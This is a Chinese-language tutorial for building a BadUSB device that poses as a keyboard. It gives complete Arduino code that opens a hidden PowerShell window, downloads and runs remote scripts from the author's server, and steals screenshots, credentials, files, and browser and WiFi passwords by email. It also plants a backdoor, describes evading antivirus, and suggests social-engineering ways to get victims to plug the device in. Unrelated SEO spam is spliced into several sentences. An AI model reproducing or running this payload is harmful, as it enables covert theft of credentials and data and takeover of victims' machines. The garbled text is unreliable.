-介绍

概述

在2014年美国黑帽大会上，安全研究人员和独立安全研究员诺尔演示了一种他们称之为“”的攻击百度搜索两次会出现下拉吗★64xl.com超级下拉平台，必应PC下拉，这种攻击使USB安全和几乎所有与USB相关的设备（包括带有USB端口的计算机）都处于非常危险的状态。

2. 内部结构

从该图片中我们可以看出，它跟普通的U盘并没有什么区别，因此非常容易造成混淆，也很容易被攻击成功。

3.隐藏攻击原理

HID是人机交互的缩写，顾名思义，HID设备是直接和人交互的设备。一般来说，针对HID的攻击主要集中在键盘和鼠标上，因为只要控制了用户的键盘，基本上就相当于控制了用户的电脑。攻击者会将攻击隐藏在普通的鼠标键盘中，当用户将包含攻击向量的鼠标或键盘插入电脑时，恶意代码就会被加载执行。简单来说，今天要介绍的就是利用虚拟键盘来实现恶意代码的执行。

4. 攻击优势

攻击者将恶意代码存放在固件中，而PC上的杀毒软件无法访问U盘上存储固件的区域，这意味着杀毒软件无法应对这种攻击。

5.

当攻击者定制攻击设备时，会在USB设备中插入一个攻击芯片，这个攻击芯片是一个很小而且功能齐全的单片机开发系统，它的名字叫。通过它可以模拟一个键盘和鼠标。当你插入这个定制的USB设备时，电脑会把它识别为一个键盘。利用设备中的微处理器和存储空间以及编程好的攻击代码，可以向主机发送控制命令，从而彻底控制主机。无论是否开启自动播放，都可以成功。

6.

它是一个方便、灵活、易用的开源电子原型开发平台。它的开发环境主要由两大部分组成：硬件部分是可以用来进行电路连接的电路板；另一个是IDE，即你电脑里的程序开发环境。你只需要在IDE里写好程序代码，把程序上传到电路板上，程序就会告诉电路板该做什么。

7.攻击流程

Bad-USB 插入后会模拟电脑上的键盘操作，通过这些操作打开电脑的命令终端，并执行命令，从指定的网站下载恶意代码（通常是脚本）并在后台静默运行。这些代码功能包括：窃取信息、反弹、发送邮件等，从而达到控制目标机器或窃取信息的目的

-准备

硬件

我这里选择的是BS pro开发板，就是一个USB主控制器加一到两个存储芯片，原理上USB主控制器就是一个原生USB接口的单片机。

它虽然体积小，但是接口丰富，使得它不仅具备传统控制器的功能，还可以实现电脑上鼠标、键盘、串口的功能，并且不需要驱动程序就能直接与电脑通讯。

它和大多数其他MCU控制板的一大区别就是编程不需要另外配编程器，而是直接使用USB就可以编程，不仅方便、稳定、可靠，还节省了编程器的费用。

淘宝链接（如果不懂写脚本请购买和作者同款开发版百度PC下拉，别贪心）：

实际交付的设备如下

2.开发环境安装

集成开发环境

已经集成在kali下，下载链接：

下载为 zip 文件，无需安装，只需解压即可使用。

注意：不要下载高于1.6.4的版本，否则设备驱动无法正常安装！（我被这个困了好久）

3. 驱动程序准备

为了能够正常烧写开发版，需要安装驱动

下载链接

一直点击Next下去，选择刚刚解压出来的.64路径就可以正常安装。

选择全部安装

4. 启用 SMTP 服务

为了保证我们的脚本能完美发送包含目标主机信息的邮件，我们需要开启SMTP邮箱服务，这里我使用的是QQ邮箱，开启方法如下：

输入你的邮箱，点击设置-账户

向下滚动查看

启用前两个服务。此过程需要密码验证。

即可获取“授权码”（即后面提到的邮箱密码），这里的邮箱密码不是指QQ密码

5. 服务器准备

①首先下载需要的代码，代码已经打包好，见文章末尾

②修改压缩包中main.ps1第2754行，将编码区域改为自己的服务器IP

③修改main.ps1的2903-2919行为发送邮件配置

④修改.ps1中前两行，域名，.rar其实是，用rar下载时尽量避免触发安全软件，如果不确定可以百度下载。.rar其实是bat因为注入时会被安全软件拦截，所以用bat避免注入。修改.ps1中的邮箱配置，和main.ps1中的一样

⑤将所有修改过的文件利用HFS（一个简单的http下载软件）上传到公网服务器

HFS 链接:

兄弟们如果没有服务器的话可以买便宜的学生机或者私聊我。

-生产

将硬件插入计算机

2. 打开 IDE

3. 工具->编辑->选择“

4.输入+R，输入命令.msc，打开设备管理器

查看串口信息

5.根据前面串口信息，打开ide，选择--->port-> “COM()”

6.现在你可以看到“on COM”出现在IDE的右下角

6.接下来，将代码写入硬件

①复制以下代码至

void setup(){//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500);Keyboard.press('r');//r键delay(500); Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法Keyboard.release(KEY_CAPS_LOCK);delay(500);Keyboard.println("CMD");delay(500);Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(3000);Keyboard.println("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/main.ps1') ");Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();//结束键盘通讯 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500);Keyboard.press('r');//r键delay(500); Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r'); Keyboard.release(KEY_CAPS_LOCK);delay(500);Keyboard.println("CMD");delay(500);Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(3000);Keyboard.println("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/payload.ps1') ");Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();//结束键盘通讯 }void loop() {}

请将8.8.8.8更改为你自己的服务器IP~

注释应该很清楚了，大家可以根据自己的需要进行修改。

PS：这里我选择执行两个，第一个是之前教大家修改上传的main.ps1，这个脚本实现了“截图、用户凭证导出、文件窃取、读取电脑内浏览器/WIFI密码”，并通过邮件发送给我们。

第二个是我在其中生成的后门，主要实现控制持久性和更高级别的渗透。如果你不知道它是什么百度PC下拉，简而言之——这是一个强大的团队协作 APT 神器。以后我会写一系列的教程来介绍它。

代码大概的意思就是：

插入后等待五秒钟。

切换到大写以绕过输入法

按 + R 打开 cmd

模拟输入字符串并按回车键执行

当你完成代码编写之后，恭喜你，你已经成功了。

测试

插上电脑，延迟几秒后，打开一个cmd窗口，输入我们下载的命令并执行，回车即可执行。

几分钟后，就会收到两封电子邮件。

这是我们辛勤工作的成果。

.zip内容如图

txt内容如下

==========================

这

==========================

########## 用户：##########

-----------------------------------

!!!

网址：

：

：

!!!

URL::8080/cgi-bin/.html

：

：

......内容太多，省略

还收到了会话（我插入了几次）

攻击场景

① 社会工程学攻击

小姐，我的电脑上没有显示 USB 驱动器。你能帮我检查一下你的电脑吗？

②带USB接口的终端

找到USB接口插上，谁插上谁就怀孕